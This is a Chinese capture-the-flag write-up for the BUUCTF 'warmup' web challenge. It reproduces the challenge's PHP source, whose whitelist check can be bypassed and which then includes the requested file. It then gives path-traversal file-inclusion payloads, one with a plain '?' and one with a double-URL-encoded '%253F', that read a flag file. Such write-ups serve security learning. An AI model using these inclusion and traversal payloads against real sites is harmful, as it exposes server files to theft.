buuctf web warmup详细题解
题目:warmup
题目来源:buuctf
分析过程:
1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件
2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。
3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。
4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,其中有两个解法,如果if函数成立(也就是(白名单)?file=(白名单)?)我们就会得到它包含在里面的文件{file}。
php
<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page)//这里定义了一个checkFire函数{$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单if (! isset($page) || !is_string($page)) {//判断格式与是否是字符类型echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?')//截取问号前的字符串);if (in_array($_page, $whitelist)) {//判断是不是白名单上的return true;}$_page = urldecode($page);//如果不成立则执行该代码块$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?')//这里对‘?’二次URL解码);if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])//检查变量是否为空&& is_string($_REQUEST['file'])//判断是否为字符串&& emmm::checkFile($_REQUEST['file'])//调用checkFile函数————————>需要函数返回一个true;) {include $_REQUEST['file'];//这里包含一个文件 盲猜里面有flagexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
(php代码、函数看不懂就上网搜)
我们键入source.php?file=hint.php?ffffllllaaaagggg
这里我们看不到那个表情包图片,说明我们键入的source.php?file=hint.php?ffffllllaaaagggg———满足条件
5. 由于我们不知道它的目录,所以用../返回(5次),打开ffffllllaaaagggg文件
source.php?file=hint.php?../../../../../ffffllllaaaagggg
就看到有flag啦
这里我们看不到那个图片,说明我们键入的source.php?file=hint.php?ffffllllaaaagggg———满足条件
第二种方式就是将将‘?’进行url二次编码,因为林澜起会对'?'解码一次,代码函数也会解码一次。所以要编码两次。
将问号改成 %253F%0A
也就是键入
source.php?file=hint.php%253F%0A../../../../../ffffllllaaaagggg
也会成功。但是至于为什么其他字符跟第一个?不会解码也不懂。
知识点总结:代码审计,要会一点点php语法,看到不懂的就上网搜
完成时间:
buuctf web warmup详细题解相关推荐
- CTF-Web小白入门篇超详细——了解CTF-Web基本题型及其解题方法 总结——包含例题的详细题解
很久之前经过一次比赛的打击,决定不能只是一直盲目的刷基础题,应该加快进度,从各种基本题型开始下手,每种题型都应该去找题目刷一刷,并做好总结.于是我去搜了一些总结的文章,便找到了一篇很好的,觉得看完后有 ...
- Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
- 【寒假每日一题】剪绳子(个人练习)详细题解+推导证明(第六天)
文章目录 前言 题目 详细题解 写法1 O(nlogn)O(nlogn)O(nlogn) 推导证明 举一反三 总结 前言 今天终于出核酸检测的结果,还好大家都没事,不然怕是要封城了!!! 今天还是寒假 ...
- 【寒假每日一题】分巧克力(个人练习)详细题解+推导证明(第八天)附带转载程序员壁纸
文章目录 前言 题目 详细题解 写法1 O(nlogn)O(nlogn)O(nlogn) 推导证明 举一反三 总结 前言 话说今天开始准备搞一个秋招的GitHub,算是复习一遍了. 今天还是寒假每日一 ...
- Unique Snowflakes 详细题解
Unique Snowflakes Emily the entrepreneur has a cool business idea: packaging and selling snowflakes. ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此 进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
- BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
最新文章
- ES6 判断是否为空对象
- CVPR2020 | 利用NAS搜索针对对抗攻击的鲁棒神经网络结构
- 如何看待Spring下单例模式与线程安全的矛盾
- python【力扣LeetCode算法题库】217-存在重复元素
- Python中read()、readline()和readlines()三者间的区别和用法
- PHP学习记录(字符串函数)
- java中随机数彩票练习_基于javascript实现彩票随机数生成(简单版)
- Linux内核调试原理和工具介绍--理解静态插装/动态插装、tracepoint、ftrace、kprobe、SystemTap、Perf、eBPF
- 编写一个程序解决选择问题。令k=N/2。
- php devel 5.3.3 26,php-5.3.27安装
- RGB在线取色器,可视化三通道颜色
- C#office的0x8002801D或者0x80029C4A问题
- 用户‘Sa’登录失败原因
- opencv (五十四)ORB特征点
- KK集团冲刺上市背后:亏损规模连年飙升,KK馆贡献占比正在衰减
- 两天两夜,1M图片优化到100kb
- 大数据 客户标签体系_大数据标签体系建立
- Adobe_Acrobat_Pro_DC_2022.003.20314 下载安装
- 记笔记非常好用的一款工具 eDiary
- pep8 python 编码方式_PEP8 Python 编码规范整理
热门文章
- Jenkins+Bitbucket webhook 自动触发构建
- Error unpacking rpm package initscripts解决方案
- c语言实现getline函数
- 十二、Python简单数据结构应用(之…
- Linux 下nm 、objdump 和 readelf 比较
- 【Verilog】消息码转AMI码的具体Verilog代码实践以及经验分享
- PyQt5基本控件详解之QTextEdit(五)
- Linux操作系统安全(一)
- 用了postman,接口测试不用愁了
- C/C++字符串函数strtok()详解